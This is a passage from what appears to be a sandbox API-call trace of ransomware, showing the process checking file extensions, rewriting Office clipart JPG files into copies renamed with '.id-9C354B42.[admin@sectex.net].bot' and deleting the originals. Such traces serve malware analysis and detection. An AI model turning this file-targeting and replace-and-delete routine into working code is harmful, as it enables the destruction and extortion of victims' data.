	[0163.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.328] lstrlenW (lpString=".doc") returned 4
	[0163.328] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.328] lstrlenW (lpString=".docx") returned 5
	[0163.328] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0163.328] lstrlenW (lpString=".pdf") returned 4
	[0163.328] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.328] lstrlenW (lpString=".xls") returned 4
	[0163.329] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.329] lstrlenW (lpString=".xlsx") returned 5
	[0163.329] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0163.329] lstrlenW (lpString=".ppt") returned 4
	[0163.329] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.329] lstrlenW (lpString=".zip") returned 4
	[0163.329] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.329] lstrlenW (lpString=".rar") returned 4
	[0163.329] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.329] lstrlenW (lpString=".bz2") returned 4
	[0163.329] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.329] lstrlenW (lpString=".7z") returned 3
	[0163.329] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.329] lstrlenW (lpString=".dbf") returned 4
	[0163.329] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.329] lstrlenW (lpString=".1cd") returned 4
	[0163.329] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 63
	[0163.329] lstrlenW (lpString=".jpg") returned 4
	[0163.329] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.329] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.329] lstrlenW (lpString="J0145895.JPG") returned 12
	[0163.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.330] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=33958) returned 1
	[0163.330] CloseHandle (hObject=0x398) returned 1
	[0163.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg")) returned 0x20
	[0163.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.330] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.330] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.331] GetLastError () returned 0x0
	[0163.331] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x84a6, lpOverlapped=0x0) returned 1
	[0163.333] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x84b0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x84b0, lpOverlapped=0x0) returned 1
	[0163.335] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.335] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.335] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.335] CloseHandle (hObject=0x3e8) returned 1
	[0163.335] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.335] SetEndOfFile (hFile=0x398) returned 1
	[0163.337] CloseHandle (hObject=0x398) returned 1
	[0163.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.338] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg")) returned 1
	[0163.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.338] lstrlenW (lpString=".doc") returned 4
	[0163.338] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.338] lstrlenW (lpString=".docx") returned 5
	[0163.338] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0163.338] lstrlenW (lpString=".pdf") returned 4
	[0163.339] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.339] lstrlenW (lpString=".xls") returned 4
	[0163.339] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.339] lstrlenW (lpString=".xlsx") returned 5
	[0163.339] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0163.339] lstrlenW (lpString=".ppt") returned 4
	[0163.339] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.339] lstrlenW (lpString=".zip") returned 4
	[0163.339] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.339] lstrlenW (lpString=".rar") returned 4
	[0163.339] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.339] lstrlenW (lpString=".bz2") returned 4
	[0163.339] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.339] lstrlenW (lpString=".7z") returned 3
	[0163.339] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.339] lstrlenW (lpString=".dbf") returned 4
	[0163.339] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.339] lstrlenW (lpString=".1cd") returned 4
	[0163.339] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.339] lstrlenW (lpString=".jpg") returned 4
	[0163.339] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.340] lstrlenW (lpString=".doc") returned 4
	[0163.340] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.340] lstrlenW (lpString=".docx") returned 5
	[0163.340] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0163.340] lstrlenW (lpString=".pdf") returned 4
	[0163.340] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.340] lstrlenW (lpString=".xls") returned 4
	[0163.340] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.340] lstrlenW (lpString=".xlsx") returned 5
	[0163.340] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0163.340] lstrlenW (lpString=".ppt") returned 4
	[0163.340] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.340] lstrlenW (lpString=".zip") returned 4
	[0163.340] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.340] lstrlenW (lpString=".rar") returned 4
	[0163.340] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.340] lstrlenW (lpString=".bz2") returned 4
	[0163.340] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.340] lstrlenW (lpString=".7z") returned 3
	[0163.340] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.340] lstrlenW (lpString=".dbf") returned 4
	[0163.340] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.340] lstrlenW (lpString=".1cd") returned 4
	[0163.340] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 63
	[0163.340] lstrlenW (lpString=".jpg") returned 4
	[0163.340] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.341] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.341] lstrlenW (lpString="J0145904.JPG") returned 12
	[0163.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.341] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=39542) returned 1
	[0163.341] CloseHandle (hObject=0x398) returned 1
	[0163.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg")) returned 0x20
	[0163.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.342] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.342] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.342] GetLastError () returned 0x0
	[0163.343] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x9a76, lpOverlapped=0x0) returned 1
	[0163.345] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x9a80, lpOverlapped=0x0) returned 1
	[0163.346] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.346] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.346] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.346] CloseHandle (hObject=0x3e8) returned 1
	[0163.346] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.347] SetEndOfFile (hFile=0x398) returned 1
	[0163.350] CloseHandle (hObject=0x398) returned 1
	[0163.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.350] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg")) returned 1
	[0163.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.351] lstrlenW (lpString=".doc") returned 4
	[0163.351] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.351] lstrlenW (lpString=".docx") returned 5
	[0163.351] lstrcmpiW (lpString1=".docx", lpString2="4.JPG") returned -1
	[0163.351] lstrlenW (lpString=".pdf") returned 4
	[0163.351] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.351] lstrlenW (lpString=".xls") returned 4
	[0163.351] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.351] lstrlenW (lpString=".xlsx") returned 5
	[0163.351] lstrcmpiW (lpString1=".xlsx", lpString2="4.JPG") returned -1
	[0163.351] lstrlenW (lpString=".ppt") returned 4
	[0163.351] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.351] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.351] lstrlenW (lpString=".zip") returned 4
	[0163.352] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.352] lstrlenW (lpString=".rar") returned 4
	[0163.352] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.352] lstrlenW (lpString=".bz2") returned 4
	[0163.352] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.352] lstrlenW (lpString=".7z") returned 3
	[0163.352] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.352] lstrlenW (lpString=".dbf") returned 4
	[0163.352] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.352] lstrlenW (lpString=".1cd") returned 4
	[0163.352] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.352] lstrlenW (lpString=".jpg") returned 4
	[0163.352] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.352] lstrlenW (lpString=".doc") returned 4
	[0163.352] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.352] lstrlenW (lpString=".docx") returned 5
	[0163.352] lstrcmpiW (lpString1=".docx", lpString2="4.JPG") returned -1
	[0163.352] lstrlenW (lpString=".pdf") returned 4
	[0163.352] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.352] lstrlenW (lpString=".xls") returned 4
	[0163.352] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.352] lstrlenW (lpString=".xlsx") returned 5
	[0163.352] lstrcmpiW (lpString1=".xlsx", lpString2="4.JPG") returned -1
	[0163.352] lstrlenW (lpString=".ppt") returned 4
	[0163.352] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.352] lstrlenW (lpString=".zip") returned 4
	[0163.352] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.352] lstrlenW (lpString=".rar") returned 4
	[0163.353] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.353] lstrlenW (lpString=".bz2") returned 4
	[0163.353] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.353] lstrlenW (lpString=".7z") returned 3
	[0163.353] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.353] lstrlenW (lpString=".dbf") returned 4
	[0163.353] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.353] lstrlenW (lpString=".1cd") returned 4
	[0163.353] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 63
	[0163.353] lstrlenW (lpString=".jpg") returned 4
	[0163.353] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.353] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.353] lstrlenW (lpString="J0146142.JPG") returned 12
	[0163.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.354] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=46508) returned 1
	[0163.354] CloseHandle (hObject=0x398) returned 1
	[0163.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg")) returned 0x20
	[0163.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.354] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.354] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0163.503] GetLastError () returned 0x0
	[0163.503] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xb5ac, lpOverlapped=0x0) returned 1
	[0163.505] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xb5b0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xb5b0, lpOverlapped=0x0) returned 1
	[0163.507] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.507] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.507] SetEndOfFile (hFile=0x388) returned 1
	[0163.507] CloseHandle (hObject=0x388) returned 1
	[0163.507] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.507] SetEndOfFile (hFile=0x398) returned 1
	[0163.510] CloseHandle (hObject=0x398) returned 1
	[0163.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.648] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg")) returned 1
	[0163.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.657] lstrlenW (lpString=".doc") returned 4
	[0163.657] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.657] lstrlenW (lpString=".docx") returned 5
	[0163.657] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0163.657] lstrlenW (lpString=".pdf") returned 4
	[0163.657] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.657] lstrlenW (lpString=".xls") returned 4
	[0163.657] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.657] lstrlenW (lpString=".xlsx") returned 5
	[0163.657] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0163.657] lstrlenW (lpString=".ppt") returned 4
	[0163.657] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.657] lstrlenW (lpString=".zip") returned 4
	[0163.657] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.657] lstrlenW (lpString=".rar") returned 4
	[0163.657] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.657] lstrlenW (lpString=".bz2") returned 4
	[0163.657] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.657] lstrlenW (lpString=".7z") returned 3
	[0163.657] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.657] lstrlenW (lpString=".dbf") returned 4
	[0163.658] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.658] lstrlenW (lpString=".1cd") returned 4
	[0163.658] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.658] lstrlenW (lpString=".jpg") returned 4
	[0163.658] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.658] lstrlenW (lpString=".doc") returned 4
	[0163.658] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.658] lstrlenW (lpString=".docx") returned 5
	[0163.658] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0163.658] lstrlenW (lpString=".pdf") returned 4
